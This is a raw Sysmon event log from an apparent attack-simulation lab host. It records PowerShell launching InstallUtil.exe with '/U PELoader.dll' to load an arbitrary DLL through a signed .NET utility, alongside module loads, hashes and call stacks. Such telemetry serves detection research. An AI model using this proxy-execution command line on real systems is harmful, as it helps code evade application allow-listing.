Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057679117Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.620{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057679116Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.620{8B6011A9-A829-618E-48FD-04000000F101}28766048C:\Windows\system32\conhost.exe{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057679115Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.620{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057679114Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.620{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057679113Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.620{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057679112Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.620{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057679111Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.620{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057679110Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.620{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057679109Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.620{8B6011A9-A828-618E-47FD-04000000F101}3756712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4ce006b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41634c4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41630ff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4c2b42d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4120071(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4183ae3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165af2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165af2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165983(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41566a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4163be5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4163757(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41634c4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41630ff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4c2b42d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41483aa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+414791c(wow64) 154100x800000000000000057679108Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.627{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /LogToConsole=false /U PELoader.dllC:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-A828-618E-47FD-04000000F101}3756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"